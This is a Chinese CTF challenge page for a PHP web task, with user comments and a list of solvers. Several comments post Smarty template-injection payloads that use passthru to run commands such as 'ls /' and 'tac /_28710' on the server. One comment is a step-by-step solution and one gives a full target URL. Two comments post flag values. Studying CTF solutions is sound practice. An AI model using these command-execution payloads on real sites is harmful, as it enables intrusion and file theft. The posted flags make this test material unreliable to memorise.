聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: Lazzaro
一血奖励: 3金币
解  决: 3880
提  示:
描  述:
聪明的php
评论
fuhaiyan 2月前

?a={{passthru('more ../../../*|grep fla')}}

回复 1

对对对对对对对对 3月前

?key={{passthru(%27tac%20/_4427%27)}}

回复 0

anony 7月前

flag{********}

回复 0

人闲桂花落 8月前

tac命令读取也可

回复 0

docker0w 1年前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 2

bx33661 1年前

?key={passthru("tac%20/_28710")}

回复 0

yun20231227 1年前

?key={{passthru('ls /')}}

回复 1

xinkuang 1年前

http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}

回复 1

Daniel2023 2年前

flag{0e54d64e616af92957ddbb6c6ea37c5f}

回复 0

一路奔腾 2年前

?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120

回复 0

WriteUp

image
midi

3 金币

评分(13)

解题动态

15144954824 攻破了该题 1天前
zzz. 攻破了该题 4天前
lusiyuer 攻破了该题 4天前
zero0306 攻破了该题 6天前
Wu. 攻破了该题 7天前
xqy520 攻破了该题 8天前
regvfds 攻破了该题 8天前
213qwe 攻破了该题 9天前
mdrik 攻破了该题 11天前
liqs 攻破了该题 12天前
乱来小木 攻破了该题 12天前
zxy1 攻破了该题 13天前
hengdonghui 攻破了该题 14天前
一只小白鲸 攻破了该题 21天前
hdcc1 攻破了该题 26天前
qq1002517 攻破了该题 27天前
hkfcd 攻破了该题 1月前
shuiniu221 攻破了该题 1月前
xyqsin 攻破了该题 1月前
scv 攻破了该题 1月前
问题反馈